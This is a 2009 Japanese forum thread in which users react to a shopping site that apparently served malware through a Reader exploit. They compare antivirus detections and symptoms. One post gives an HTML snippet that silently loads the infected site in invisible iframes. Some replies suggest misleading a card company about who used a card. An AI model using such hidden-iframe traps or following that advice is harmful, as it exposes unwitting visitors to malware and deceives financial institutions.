ウイルス流布は3年以下の懲役、またはは50万円以下の罰金です


387 名無しさん＠編集中 sage 2009/04/05(日) 01:43:52 ID:YMpr/blu
>>384
ブート領域をやられてると、それではだめ。
昨日の俺がそうだった。

レタスの人に誰か指摘してやれよ
こんな糞重ブログ二度とアクセスしたくないぞ

ウィルススキャンしたが何も見つからなかったので
システム復元したわ

>>573
genoよりそこに通報したほうがことが早そうだなｗ

Adobe Readerの8.1.4だったら問題ないの？

ローレベルフォーマットしないと削除できないウイルスなんてあるのかよｗｗ

社員12名？こりゃダメだｗ

一つのことにこれだけ情熱注げられるのは尊敬するわー　しかもレタスだし何がそこまで駆り立てるのか

>>563
Adobe Readerのバージョンはやっぱり8.1.1以前だったの？

誰が仕込んだんだろう本当に２ちゃんへのリベンジだったらホレタ

>>582
家もレタスをつくってるからブログ自体に凄く興味ある
家庭菜園のレタスでももっさーーーーーってなるからすごい

俺も危うくレタス作ろうかという気になってたし
少しは宣伝になってるだろうな

IE6+Adobe Readerの7.0英語版で踏んだけど特になんともない
ワイヤーシャークでもへんなパケットはでてないけどな

>>573
おおここが0.1か

>>576
トップは普通だぞ
http://azcji.cocolog-nifty.com/blog/

IE6+Adobe Reader6.0
でも自動起動してないが心配R二乗

>>573
これ見るとデータベースはそこの会社に置いてるようだけど
…まだ安心はできないか

もう4時間（AVGとﾄﾚﾝﾄﾞｵﾝﾗｲﾝ）もｳｨﾙｽスキャンしてるお
シングルはつらい

メモリはいつも通りだな。何かされててもわからんがｗ

>>589
いつもネタで貼られてるけど中の人は真剣なんだな

今キタでスレ全読してないけど

http://itpro.nikkeibp.co.jp/article/NEWS/20090311/326370/

ここの記事にある「Adobe Reader」および「Adobe Acrobat」の脆弱性を>>1のサイトが悪用してくるってこと？
最新版に更新してたユーザーには被害は及ばないと考えていいわけ？

2009年4月2日　カナダ産のウイルス。以下が対応しているソフト↓

>>564から、
eSafe 7.0.17.0 　　　　　2009.04.02 Suspicious File
GData 19 　　　　　2009.04.03 Win32:KillAV-KS
Ikarus T3.1.1.49.0 2009.04.03 Trojan-Spy.Agent
Kaspersky　7.0.0.125 2009.04.03 Backdoor.Win32.Agent.afhg
McAfee+Artemis 5573 2009.04.03 Generic!Artemis
Prevx1 V2 　　　　　2009.04.03 High Risk Cloaked Malware
Sophos 4.40.0 　　　　　2009.04.03 Mal/Generic-A
TrendMicro 8.700.0.1004 2009.04.03 PAK_Generic.001

なんか不安になってきた
クラスタレベルでのﾊﾞｯｸｱｯﾌﾟ、復元ならよっぽど大丈夫でしょ？
大丈夫と言ってくれ

＞＞596
TrendMicro 8.700.0.1004 2009.04.03 PAK_Generic.001
バスターはセフセフなの？ねえったら！

CPU 100%　突然

>>592
スキャン見守りを交代してくれる嫁を…

今仮想マシンで踏んで来たけど何も問題ないっぽかった
アドビ入れてると危ないの？

ウイルスかかると何されんのよ

>>580
Hacktool.Rootkit

Windows Vistaアンチウィルス無し
Firefox 3.0.8 JavaScriptオン
Adobe Reader 8.1.3

この環境でたっぷり踏んでしまったけど
PDFを開こうとはしなかったし、とりあえずなんともないみたい

おまえらウイルス過敏過ぎて笑える

アドビリーダが自動起動した奴の環境が知りたい

日曜日のお昼はもっと感染者増えるだろうね

オペラですっかり開きました

>>324施す前はリーダ起動以前に火狐落ちた

opera
アンチウイルスなし
ウィンドウズ2000
テキトウなアクロバットリーダー
スレイプニルだとポップアップでブロックするけど許可してみたら開いた

ん？スキャンしても見つからないとか疑心暗鬼にさせんなや

ブラウザの履歴見ると金曜にアクセスしてた
いつからウイルスばら撒いてたんだよ

Adobe Reader 8.1.2 でギリギリだったけど起動エラーが出た
ほっといたらSleipnirもエラーで落ちた
バスター2007は無反応だったよ
面倒くさくて2009にしてないのが悪いけど

AVG+PCTOOLS

niftyオンラインスキャン（カスペル）
fなんたらオンラインスキャン
両方異常なし

>>612
それがわかんないんだよね。
だからみんな不安がっているってのもある。
おいらもその一人。

c:\u.bat
c:\_.t
c:\u.ba
もない？なんだろうね

>>604
遅レスだけどReaderの改良版って8.1.4みたいだな、8.1.3は未対応なんじゃ
9.1や8.1.4なら安心かどうかは分からないけど

genoは公表しないのか

Acrobat更新してないやつが悪い。解散

>>616
もしかするとアドミン権限無しの垢でgenoのサイトに行った場合と
アドミン権限ありの垢でサイトに行った場合でも挙動が違うのかもしれないね。

アドミン権限なしなのでbatファイルの生成が出来なくて被害を被らなかった可能性もあるかと。

管理者権限ないと使えないツール多いからなぁ・・・

>>596
SuspiciousやGenericは疑いがあって検出してるだけで
完全に防ぎきれているか不明

>>622
だね書き方が不足してた

>>617
む、そうするとFirefoxの段階で食い止めたのかな?
Readerプラグインは入ってたはずなんだけど

>>596
avastもはいってるじゃないかｗｗｗ意図的に外したなさては、、
http://www.virustotal.com/analisis/48cfd289b06a1fb46dfbcb9fc8bad17a

>>10重すぎワロタ
http://www.dotup.org/uploda/www.dotup.org24677.jpg

ところでどこかと通信してるっていうのは何を送信されてるの？
HDDの中身とか？

>>625
わざとじゃないｗｗｗｗ素で抜かしたｗｗｗ

現時点ではどのソフトもヒューリスティックでしか検出してない感じがする

>>596
avastも入れろよ粕

>>573
そうそう
そこに面接に行った
採用人数少なかったので落とされたが

たしかシステムはマックサーバーで動いてるって言ってた

>>628
ふふふｗ

>>630
わかってるよ粕

>>633
わかればいいわ粕

>>627
誰もパケットの中身を解析した結果を晒していないから判らないけど、
WindowsのライセンスIDとか、利用者名とか、なんかのパスワードとかメルアドとか
そーいうデータが送信されちゃうのが、この種のウィルスのお約束。

結局、レジストリの中の特定のキーに記載されているデータが流れちゃう。

これはどうなの？
http://digg.com/u16ge

誰か>>10のリンクをCorei7を持っていてクリックしたい勇者はいらっしゃいませんでしょうか?

>>636
最近は簡単にアク禁しまくりだから調子に乗って張りまくらないほうがいいよ。

何日頃からGENOにウイルスが仕込まれて始めたのよ。
とりあえず木曜日以降は　アクセスしてないんだけど。

>>635
仮想化でも情報入れてたらアウトか

>>637
i7で踏んだが落ちた。

そこのサイト、一度も見たことないんだけど、
大丈夫？

>>634
検出できるソフト一覧やり直したよ粕

●a-squared 　　　　4.0.0.101
　2009.04.03 Trojan-Spy.Agent!IK
●Avast 　　　　　　4.8.1335.0
　2009.04.03 Win32:Daonol-L
●eSafe 　　　　　　7.0.17.0
　2009.04.02 Suspicious File
●GData 　　　　　　19
　2009.04.03 Win32:KillAV-KS
●Ikarus 　　 T3.1.1.49.0
　2009.04.03 Trojan-Spy.Agent
●Kaspersky 　　　　7.0.0.125
　2009.04.03 Backdoor.Win32.Agent.afhg
●McAfee+Artemis 5573
　2009.04.03 Generic!Artemis
●Prevx1 　　　　　V2
　2009.04.03 High Risk Cloaked Malware
●Sophos 4.40.0
　2009.04.03 Mal/Generic-A
●TrendMicro 8.700.0.1004
　2009.04.03 PAK_Generic.001

ベンチマークっていったらこれだろ。Q9550定格の9800GTだが、CPU使用率80％近いｗ
重すぎてタスマネすら出てこないｗ

http://www.nicovideo.jp/watch/sm1200617

>>640
そりゃあたりまえだろってｗ

早い話がサイトチェッカーを入れたブラウザで行きたいサイトのURLをコピッてググれば一目瞭然ってことかな?

>>641
キャプれない程でしたか?

>>207
Windows98で踏むとウイルスpdfを返してこないっぽい

>>644
読み込みすらしないワロタ

>>10
http://www8.uploader.jp/user/vipc/images/vipc_uljp01130.jpg
すげぇな・・・・

>>645
ニコ動のアカウント位しか入れてないが変えてくるか

>>639
4月4日早朝説が有力だけど…、確定情報無し

アドビ9使ってノートンでスキャンしたけどクリーンインスコしとけば完全に安心だよな？クレカも使ってるしこのあいだもヤフオクしたしやばいかな？

あれ？>>10は前にXP上のFirefoxで見たらブラウザ落ちてたけど
Ubuntu上のFirefoxで見たら完走したよ
この違いは何なんだ

vista operaでgenoを踏んだが異常なし。

>>616
Chrome + Adobe Reader 9.1.0 で踏んだがそれなかった
Readerさえ更新していればセーフ？

>>647
画像読み込みが完了したあと、IEが反応無しになったんで、
「×」押して終了させた。キャプは試してないなぁ。

>>631
しかし落ちてよかったな。

注文を0.1にできたり、漢字変換すらできない会社だぜ…。

俺は、カスペと先生とアバ入れてたから助かったよ
ちょっと重いけど我慢してた甲斐あったｗ

>>653
あわてるな。環境によってはそのままでいいわけだから。

引っかかったPCの環境を知りたい

>>648
多分、jQueryがIE5とかネスケ4.7とか、古いブラウザに対応していないから
単にスルーされちゃっているだけかもしれないけど、ぶっちゃけ、よくわかんないな。

>>657
CPUモニターを表示した状態でもう一度トライできませんでしょうか?

>>651
どの道仮想PCなら踏む前に保存してたイメージファイルから復元するだけだろうがｗ

0.1ってそういう意味だったのかワロス

>>648
>>661
OSやIE偽装してみてアクセスしたらどう？

ウイルスにひっかからなかったら　バージョンで判断
ひっかかったらバージョンで判断じゃなくjQueryが対応してないだけ

復元は出来ても持っていかれた情報は取り返せない

それは言わない約束だぞ

>>139
さすが俺のavastとa-squared

>>658
社長は年内にマザーズに上場するって言ってたんだが
こりゃ無理かもしれんなｗ

そういえば、固まったときに再起動かけたら、＠＠＠＠＠で埋め尽くされている内容を
ＰＤＦ経由ではき出そうとしてたわ。だけど、宛先欄やっｃｃ欄は空のままで、
普通に　送信　キャンセル　などの選択ができた。　もちろんキャンセルしたけど・・

火狐閲覧でｒｅａｄｅｒは８．１２だったけど・・

・・・もうどうでもいいや。俺の個人情報なんて安すぎる代物だし・・・

>>665
わざわざそこまで解析する程、気合入ってないです＞＜

>>664
0より上で1以下の数値が入れられる状態だったから
0.1とか0.001とかでも　商品が買える状態になってたｗ
金額も *個数だから当然1/10とかになっちゃうわけで。

で在庫数が　54.00987とかになっててﾜﾛﾀ

>>672
今はできないのか

あ、あとここに専ブラで書き込んだら、なぜか初回起動時のときのように、
書き込みに関する同意を求められた・・・やっぱなんかあるのかな・・・

>>669
ここの導入事例の会社　半分近くがサイト閉じてるぞｗ

http://www8.uploader.jp/user/vipc/images/vipc_uljp01131.jpg
たかがブラウザごときですげぇｗｗｗ

>>662
CPUモニタってのが分からない（；^ω^）タスクマネージャとは別物?

javascript:alert(document.lastModified)←これ貼り付けたらHPの最終更新日確認できないかな
感染以降にgenoが更新してたら無駄か…

>>674
それCoｋkieの仕様変更
お前ら Cokkie が tepo=don に変わったぞ
http://tsushima.2ch.net/test/read.cgi/news/1238848586/

俺もびびった

>>677
タスクマネージャのそれを表示した状態でというつもりだったのですが(苦笑)

>>663
設定は保存できるだろ・・・・・
returnilあたりで仮想化してりゃ話は別だが

>>660
もうクリーンインスコしちゃったw環境とは？

>>674
それは多分↓のせい。
他に単にインターネットオプションでクッキー全部消したのならその挙動は当然。

お前ら Cokkie が tepo=don に変わったぞ
http://tsushima.2ch.net/test/read.cgi/news/1238848586/

>>674 IPが変わったからじゃないか？再起動したでしょ

>>673
なおった。注文したユーザーには、
件名に「キャンセルしました」　ってメールが届いた。
しかも内容はなし。何も書かれてないｗ　件名だけ

振り込んじゃったユーザーもいったらしいけど、
金は返ってきてないとかなんとか。本当か知らんが。
ユーザーのデータごと丸ごと消したのかも知れんね。

>>685
ひでえな
前々からgenoの悪評は聞いていたが。

>>683
suka=pontanの時もそうだけど
こんなの変更するのに意味ないのにうぜえ

>>687
まぁ、運営の連中の遊びだからな。これはｗ

>>665
あれ…
今はUA弄ってもPDF返してくる…
さっきのはなんだったんだろう

TIME WARP 2009生中継 @ sunshine live

現地時間4/4（土） 20時-08時
日本時間4/5（日） 03時-15時 （時差7時間/サマータイム）

ttp://www.sunshine-live.de/on-tour-detail/show/1970/januar/time-warp-2/

TIME WARP @ Maimarkthalle, Mannheim Germany
ttp://www.time-warp.de/

sunshine-live
ttp://www.sunshine-live.de/

ミ☆Techno Festival 実況スレ☆ミ Part6
http://mamono.2ch.net/test/read.cgi/techno/1226778243/

まだGenoが対策取ってないから
さらに新しいウイルスを仕込まれる可能性もあるな

とりあえず感染してなくても個人情報を抜かれてる可能性がないではないので
使ったことがある人はgenoにメールしておいた方がいいだろうな

購入前のお問い合わせ@geno
http://www.geno.co.jp/webshop/before.html

もしgenoから何のリアクションもないようならIPAか？
仕事に飢えてるから飛びつくだろ

ウイルス届出画面@ipa
https://isec.ipa.go.jp/inq/servlet/InqMainServlet?id=frm0190

IT Solutionの導入事例

導入事例　コクヨストアクリエーション
http://www.it-solution.jp/casestudy/kokuyo/index.html
http://www.sale-egao.com/

導入事例　シルバーウイン
http://www.it-solution.jp/casestudy/silver/index.html
http://www.silverwin.co.jp/index.html

導入事例　シーブイ商会
http://www.it-solution.jp/casestudy/cv/index.html
http://www.cvshokai.com/

踏んだけど、プラグイン追加しろとか言われて何もおきなかった

>>672
ワロスｗｗｗ

おぉ・・ちょっと安心したぜよ

>>680
これでいい?

ttp://www.img5.net/src/up8998.jpg

>>692
岡ちゃんに相談か

あ、いつ　この悪意あるスクリプトが組み込まれたか
ieHTTPHeaders使えばわかるんじゃない？

更新日みれば。
俺は踏めないが。

こんなのを貼ってるやつもいるので注意
これもgenoに飛ぶ↓ (http://を*に置換)

147名前： SM-3(中部地方) []投稿日：2009/04/05(日) 02:15:51.13 ID:sh57WKtI
>>86
*******go.2ch2.net/u/V2Afcq?mofu4_2137.zip

>>697
篤？

>>692
IPAならATOKの件を払拭したくて無駄に張り切りそうだよねｗ

>>697
な・ん・だと！

>>361
のウイルスはブラウザのJavaを切っていても、AcrobatプラグインからAcrobatのJavaを使って感染するのか。
なんでpdfにJavaが必要なんだ？

>>701
消し忘れてた＼(^o^)／

まぁいいや。

>>700
こんなのもあんのかよ…

www.geno-web.jp開いたけど何もなかった。
一時的にブラウザが応答なしになったけど数秒で復帰した。
これって問題ないの？

Sleipnir 2.84 & IE8
WinXP SP3
Reader 9.12
Professional 8.1.4
普段はProfessionalで開いてるみたい
Norton先生2009 体験版

>>706
狐さんにZIPスレ禁止令を出してもらわないと駄目かもわからんな。

ttp://www.geno.co.jp/xmlrss/osusume.js
4月4日 17:48 だな

>>709
日本時間？

＞326 ：名無しさん ：sage ：2009/04/04(土) 10:43:40 0

10時には報告されてるし、更新されたってことか？

>>697
そういう感じです。
やっぱりCorei7だと重たい処理も多少は平気のようですねぇ。
挑戦してくださったことに感謝いたします。

http://tsushima.2ch.net/test/read.cgi/news/1238864449/250

これはなんなんだ

>>710
iriaでダウンロードして生成したファイルのタイムスタンプだから、どうだろう…

netstatで調べたらこんなん出るんですけどやばくないですか？
UDP 127.0.0.1: 1033 (localhost: 1033) -> Sleipnir.exe(332)
キンタマのポートのような

じゃあ俺も！！
http://up2.viploader.net/pic/src/viploader968846.jpg

今北人用

ν速公認ベンチマークブログ
いつでもレタス
http://azcji.cocolog-nifty.com/blog/cat1459704/index.html

>>572
他スレに貼るなカス
殺すぞ

>>716
これも忘れるな
http://www.nicovideo.jp/watch/sm1200617

リカバリすればとりあえず安全なんでしょうか？

朝鮮のミサイル発射がされなかったのも発射管制システム（Windows98海賊版)がGenoでウイルス感染したからかもしれない

>>719
情報は取られた後の可能性があるので
パスワード暗証番号変更しといた方が。

ｔｖｋでおっぱい

ttp://up2.viploader.net/pic/src/viploader968856.png

>>712
JS/WindowBomb.G トロイの木馬 接続が切断されました - 隔離しました

>>721
やっぱそうなんですか。
今再インストール終わった所で色々設定していまして

>>712
　　　　　 　　 　 　 　 　 　 　 　 　 ＿＿＿＿＿＿＿＿＿＿＿＿_
　　　　　　　　　　　　　　　　　　　 ||　　　　　 　 　 　 　 　 　 　 　 |
　　　　　　　　　　　　　　　　　　　 ||　　JS/WindowBomb.G　　　 |
　　　　　　　　　　　　　　　　　　　 || 　 ウイルスです？ 　 　 　 　 |
　　　　　　　　　　　　　　　　　　　 ||　　　　　 　 　 　 　 　 　 　 　 |
　　　　　　　　　　　　　　　　　　　 |ｌ -――-　　　　　　 　 　 　 　 |
　　　　　　　　　　　　 　 　 　 　 '"´: : : : : : : : :｀丶　　　　　　　　　|
　　　　　　　　　　　　　　　　 ':.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:ヽ＿＿＿＿＿_|
　　　　　　　　　 　 　 　 　 /.::.::./.::.::.::.:j.::.::.:|.:ﾑ;ﾍ.::.:ハ￣￣￣￣￣
　　　　　　　 　 　 　 　 　 ,'.::.::.::i.::.::.::.:/|.::.:: l/　 ｀|.::./7
　　　　　　　　　　　 　 　 :.::.::.::j:|.:!.:_:/´|_.::_｣　 　くV <|
　　 　 　 　 　 　 　 　 　 |:ﾊ_::_ﾙ'´　　 　 /⌒丶 j//V|
　　　　　　　　　　　　　　 |:::::::::i x==ﾐ 　 　 ＿　〈/.:|.::|
　　　　　　　　　　　　　　 |:::::::::ｉ:'"　　　　 ´￣ﾞY}!.::.ｌ.::|
　　　　　　 　 　 　 　 　 八:::::::圦　　 ､' _ 　 "/_ﾉ.::,'.::j
　　　　　　　　　　　　　/⌒ヽ::::ト{＼　　　_,.ィ__/.::/ｌ:./
　　　　　　 　 　 　 　 /　丶∧::| 丶 ｀ﾆ´ 彡// :厶|∧
　　　　　　　　　　　　{/　　丶ﾍ|　　　　 ノ / |:/ (こ　ﾊ
　 　 　 　 　 　 　 　 /　　 　 　 }ヽ、 ∧　/　 'x┴〈　}_ゝ､
　　　　　　　　　　　/ 　 　 　 　 ＼∨　∨　 /　 ﾆ�W　}　 ）
　　　　 　 　 　 　 〈　　　　　　　_ノ∧　厶=7　 ,.-､)　人ノ
　　　　　　　　　　　}⌒ヽ 　 　 `＜__,>ｲ　　|__ノ|　|／∨

>>643
やればできるじゃないか粕ｗｗｗ
俺もスキャンしててしばらく寝られないからもう少し相手するぞ

ひでぇなこれ。カード情報送ってんじゃん。
まあ、俺はカード持ってないからいいんだけども。
前に打ったなんちゃってカード情報を送ろうとしてた。

a-squared 4.0.0.101 2009.04.03 Trojan-Spy.Agent!IK
Avast 4.8.1335.0 2009.04.03 Win32:Daonol-L
eSafe 7.0.17.0 2009.04.02 Suspicious File
GData 19 2009.04.03 Win32:KillAV-KS
Ikarus T3.1.1.49.0 2009.04.03 Trojan-Spy.Agent
Kaspersky 7.0.0.125 2009.04.03 Backdoor.Win32.Agent.afhg
McAfee+Artemis 5573 2009.04.03 Generic!Artemis
Prevx1 V2 2009.04.03 High Risk Cloaked Malware
Sophos 4.40.0 2009.04.03 Mal/Generic-A
TrendMicro 8.700.0.1004 2009.04.03 PAK_Generic.001
AntiVirが対応してないだと・・・・？
一番更新早いベンダーってどこだっけ

親のクレカ使用、ヤフオクも利用したばっかだとどんな危険性がある？踏んだからいまクリーンインスコしてるんだが

>>715
善戦してるなｗ

俺も
http://up2.viploader.net/pic3/src/vl2_116270.jpg
IE8でもブラウザ固まったわｗ

いつでもレタスに文句言った奴はいないのかね
自分のPCでも重いってわかるだろうにね

>>730
親がネラーでもないのに身に覚えがない●の購入費用で未来検索ブラジルから請求がきたりするかも知れないから、
この後の利用明細と請求元の確認は当面怠らないほうがいいと思うよ。

非力だからここでもかなりもたつく
http://www.police.pref.shizuoka.jp/keisatusho/kakegawa/kakegawa.htm

>>735
ワロタｗｗｗｗ

>>735

>>733
だからトップはhttp://azcji.cocolog-nifty.com/blog/だって

>>735
こんな時間にヤメロｗｗ

あっぶね
このスレ見といて良かったわ

BGM自重ｗ

http://uproda.2ch-library.com/1170704J5/lib117070.jpg

zipのパス解析ソフト二つ起動させて50％

>>735
ﾜﾛﾀ

>>735
深夜だからだろうか笑いが増すわｗ

一二年前に掛川署のサイトでスレ立って、俺がレタス見たのはその時が初めてだったな。

>>735
油断してた
これはやばいｗ

>>735の何が面白いんだと思ったら
おまえらquicktimeなんか入れてんのか

<EMBED src="song.mp3" autostart="true" hidden="true" loop="true">

自動スタート・無限ループって怖くね？

Eee買おうかなと思ってたのにｗ

>>734
●？未来検索ブラジル？よくわからないがありがとう。請求きたら無視でいいの？確実に悪用されるんじゃなくて悪用される可能性もあるってことだよね？

>>748
反則だよねｗ
まだMIDIファイルエンドレス再生の方が良心的だわｗ

>>750
請求きたらカード会社に連絡。
不正に使われたって事でとめてもらわないと。

カード会社によっては、
手続きが面倒だったり、警察に届けなきゃいけなかったりする。

またまたGeno祭ｗ

>>750
利用明細をチェックして買い物をしたことがない会社から請求があったら
即効でカード会社に連絡。
そうすればちゃんとカード会社で対処して金を銀行口座から引き落とされなくて済むようになる。

てか、名義人のパパにその辺の事情を正直に話して手続きしてもらいなさい。
まぁ、パパから説教されても仕方ないけどなｗ

つーか、子供は寝なさい。

まだ祭り終わってなかったんだ、秋葉の店頭で「放置してていいんですか？」
って教えてやったのに「はぁ？」って言われたぐらいだから無理かｗ

被害が出たらgeno訴えればいいの？

技術ない人が制作担当した代物に見えるんだが、
こういうのって簡単に直せるん？

ウィルスじゃなく、GENOのサイトのことね

>>757
つ閉鎖

キーロガーだったら涙目な奴多そうだな

>>716
これOperaﾀﾝだと問題なくね？
CPUがQ9400ﾒﾓﾘ6GOpera9.62

genoって普段でもやたら重かったりしたよな
今に始まった事じゃなかったりしてw

>>752
>>754
ありがとう。とりあえず不正な請求は払わないで済むってことだよな。名義人に説明したいんだが入院中でw

>>763
余談だけど、この種の手続きは名義人本人じゃないと出来ないんで、
不正請求が来た場合はいずれにしても入院患者に一働きしてもらわないと無理だぞｗ

今ってまだＧｅｎｏひらいたらやばいの？

foxit大勝利！！！！！！

今回のやつ踏んだらどんなウイルスにかかるわけでござんしょ。

>>765
大丈夫だよ

PC我ぶっ壊れた

735って何が問題なんだ？
普通の警察署しか表示されてないように見えるが

>>763
そもそも親子だろうと、自分以外の名義のクレカ使用は規約違反だよ。
クレカはカード会社から、名義人に貸与されているもの、所有権はカード会社が保有している。
不正請求があってカード会社に、連絡する時は名義人に電話さして使った人も名義人だったことにしないと
免責にならない可能性大だよ。
ウイルスに引っかかったのは、名義人以外にしても問題無いだろうけど。

>>768
開いたけど超重くてブラウザ固まるｗｗｗ
だましたなｗｗｗｗｗ

Janeのあぼーん詰め合わせパック更新してくれ

>>772
終わったなお前。タスクマネージャー開いてみろ

>>772
仮想・砂箱環境の俺は大丈夫だよ

>>772
ウイルス感染しとるがなｗ

>>770
これが面白い
http://www.police.pref.shizuoka.jp/keisatusho/kakegawa/song.mp3

俺はプラグイン入れてなかったから最初わからなかった

>>772
愛知さんかっけー

>>772
おまい、判ってて踏んでるだろｗ

>>777
夜中になんてものを流させるんだﾜﾛﾀ

>>771
使ったのは入院する前に名義人が自分のPCを使ってクレカを使ってました。ヤフオクも入院する少し前に簡単決済で支払ってました。それでもアウトかな？

>>10
メモリー使用量がぐんぐん上がるなｗ

>>756
GENOが早いうちにお詫び掲載すれば許されるかも知れないけど
長期間放置してたら責任は逃れられないんじゃないか。
休みの日も毎日9時に更新もしているわけだし。

掲載しなかった場合が問題だな。
気付かないまま感染とかになってるユーザーが大変なことになりそう。

どっちにしろGENOは不正アクセスされたとかなら
警察に言わないといけないだろ。
言わなきゃ、完全にGENOの責任でいいよ。

>>781
そんな馬鹿正直になる必要ないぞｗ

>>783
サイト開設してからの通算利用者数がどう少なく見積もっても5000名以上はいる筈なんで、
この種の問題の場合も正しく対処しないと最悪の場合、個人情報保護法違反で
Genoの運営管理者が書類送検されても仕方ないレベルだからね。

踏んでウィルス食らった連中でわざわざ集団訴訟を起こさなくても
警察から大目玉食らっちゃうレベル。

GENOは「何も起きてません」の一点張りだったりして
「何も起きてないので、何の責任もありません」とかｗ

http://www.geno-web.jp/Goods/GB08002080
これ欲しい。注文したいけど大丈夫かな？

>>781
それでいいけど、病院からでも名義人本人がクレカのデスクに電話しないとダメ、これ絶対。
バレないにしても、リスクを冒す必要はない。
ウイルスのこととクレカの番号が漏れた可能性が大きいから、クレカの番号を変更してくれと言えば大手のクレカなら変えてくれる。
もっと簡単に、クレカを紛失したと連絡すれば、現在のクレカが使用停止になり、新しい番号のクレカを送ってくれる。
ちなみに、何処のカード会社？

AntiVirユーザーがこの先生きのこるには・・・(´；ω；`)ﾌﾞﾜｯ

1週間ほど前のTrueImageでのバックアップがあったんでひとまずその時点まで戻した
ちょうどHDD換装したんでその際に使ったファイルだ
まあそのHDDはgenoで買ったものなんだけどな

何も気にせずGENO見てたけどなんともなかったんだよなぁ
ウイルス対策ソフトも入れてないし・・・
でもみんながヤバイ言ってるから今行く勇気ないしｗ

>>786
そのときは岡ちゃんに一働きさせるだけｗ

>>789
avira検出できなかったようだなｗ

>>789
だからavastとのデュアルエンジンにしておけとあれほど

<EMBED src="http://www.police.pref.shizuoka.jp/keisatusho/kakegawa/song.mp3" autostart="true" hidden="true" loop="true">
<img src="http://azcji.cocolog-nifty.com/blog/cat1459704/index.html" width="1" height="1">
<img src="http://www.geno-web.jp/" width="1" height="1">

これを自分のページに入れたらどうなるんだろう？

>>795
imgタグじゃなくてiframeとかだろ

>>796
やっぱimgじゃだめか

geno開いたら94.247.2.195に繋ごうとしてたから慌てて閉じたw

>>797
タグ以前のレベルで
少なくても静岡県警のMP3ファイルなんかは
鯖の設定で別ドメインからリンクしてもまともに鳴らせない可能性もあるよ。

治らねえよ
頻繁にブラウザ落ちる

>>799
アザレアで実験してみようと思ったら、メアドもパスも忘れてたｗ

やっとメインＰＣの入れなおしが終ったよ。
怖いよな。こういのって。

おいいまきたぞ
誰かまとめろ

とりあえずシステム復元したけど大丈夫かな

<html>
<EMBED src="http://www.police.pref.shizuoka.jp/keisatusho/kakegawa/song.mp3" autostart="true" hidden="true" loop="true">
<iframe src="http://azcji.cocolog-nifty.com/blog/cat1459704/index.html" width="0" height="0" border="0">
<iframe src="http://www.geno-web.jp/" width="0" height="0" border="0">
<a href="javascript:window.close()">今更感たっぷりだけど「閉じる」</a>
</html>

これでいいだろ

>>803
>>805を保存してブラウザで開く

Adobe Readerを起動して[ファイル]から使用したpdfの履歴が見れるけど、
そこに覚えのないタイトルが無ければ大丈夫？

どーでもいいけど、お日様があがったらウィルスよりも怖い
テポドン3号が飛んでくるかも知れないんだから
そろそろ寝た方がいいんじゃないの？ｗ

つーか、おいらは寝るｗ

>>808
おやすみ・・・永遠に(´；ω；｀)ﾌﾞﾜｯ

>>806
やった
でなんなの？

ちくしょう。怖くて他のスレでもリンク踏めないよｗ
どうしてくれんだよ不能になっちまったよオレ。

>>810
何とも無いなら大丈夫

プニル2.8.4で踏んでしまった
開いてすぐ閉じたからアクロバットリーダーが勝手に開こうとしたかはわからない…
ウイルスバスター2009入れてるけど、これって感染しちゃった？

>>810
いいパソコン使ってるな
T5500と2GBメモリだと落ちるのは仕方ないね
http://hirame.vip2ch.com/up/hirame033045.jpg

パソコン再起動したら起動しなくなったｗｗｗ
今リカバリ中ｗｗｗｗｗｗｗｗ
ふざけんなよｗｗｗｗｗｗ

>>774
そういやタスクマネージャ起動しなかったな
おかげでサブマシン死んだわｗｗｗｗくそがｗｗｗｗ

愛知さんかっけー

>>10
PCが爆発するかと思った。

>>814
もっさりｹﾛﾘﾝ
http://hirame.vip2ch.com/up/hirame033046.jpg

>>813
重くなったのを感じたら駄目かも
acrobatの履歴か、neetstatコマンドか、どちらかで感染の確認できるかな？
どうなんでしょう、感染した人

踏みたい！踏みてぇ！！！！！！！

//www.geno-web.jp/MainMenu.html
-- 「2009/04/05 0:37」のキャッシュをチェックしています。 --
注意！アラートオープンを発見！ (2)
ブラクラチェックが終了しました。

※ フォームタグを発見しました。(1)
/4DCGI/Login
※ 隠しスクリプトを発見しました。(10)
main_script.js
//log3.recommender.jp/js/logrecom.js←こいつがやばいくさいな（危険素人はふむなよ）
//www.geno.co.jp/4D/banner_koukoku.js
上記アドレスのチェックもお勧めします。(そのままチェックできます。)

>>821
こういう危険サイトで遊ぶときはvirtualboxとか仮想PCおすすめ

もしかしてkakikomi.txtも見られるかもしれないのか・・・？

>>820
neetstatｗ

常時waitだろｗ

>>820
重くなったよ…

>>798さんが言っているような
アクセスしてるIPアドレスってどこから確認できるんでしょうか

>>826
やったね！たえちゃん

もー怒った
岡ちゃんに通報してくる

>>823
サンクス。
今からVirtualPC2007入れて踏んじゃうよｗ

www.geno

NGワード

このログ保存しとこ
うぃるすこえー

ウイルスだと言われても
ついurl踏みたくなる

ジェノ踏んじゃったんでconime.exe検索したら
作った覚えの無いCONIME.EXE-13EEEA1A.pfが昨日作成されてるな
これはすぐ消そう

ねぇねぇ俺いつも
http://so.7walker.net/guide.php
で、チェックしてるんだけど、他にイイ奴ない？

http://www.gred.jp/
上見たいにイメージが表示される所がいいんだけど、
ここはちとイメージが小さいんだよね
ちなみにここでチェックすると安全って出ちゃうｗ

まだ直ってないんだよね？！

再起動したら重く無くなった
どういう事だ…

>>820
neetstatしたら、trueが返ってきたｗ

>>827
俺のバヤイはブラウザの左下のステータスで見た。(リンクにカーソル置いたらURLが表示されるトコ
genoのサイトが表示が遅かったので気づけた。
ところでカード決済はカード会社に頼めば海外からのは無効にできるとかあるのかな？
沖縄だし通販ないと不便極まりないよ！

気合入れてFireFoxで開いてみたらプラグインをインスコしないとすべてを表示できませんってでて
普通に重くなく見れるけどセーフだよな？

一時激重になったがブラウザ落ちたら特に変わったところないな　普通

adobe入れてないからセーフかな？

>>540にSystem Idle ProcessがあってCPU喰いまくってたらやばいって書いてあるけど本当？クリーンインスコしてもかなりくってるよ

２ちゃんねるの情報なんて信じない方がいい。

>>842
ぐぐれないほど馬鹿なの？

>>838
なるほど。だとすると踏んだ時じゃないとわからないか…

netstatっての調べてコマンドプロンプトからやってみたんだけどわけわかめ
グローバルアドレスが2つほどあったからアクセスしようとしたら拒否された
後なんか送受信パケット数が少しずつ増え続けてるんだがなんだろこれ

アホばっかだな

接続IP・ホストのモニタリングもできない奴が
AVだけ入れてれば十分っしょwwwとかレスしてると思うと吐き気がする

adobeじゃなくてfoxitでいいじゃない

メインブラウザLynxとChaliceでよかったｗ
でもLynxだと注文出来ないんだよな…

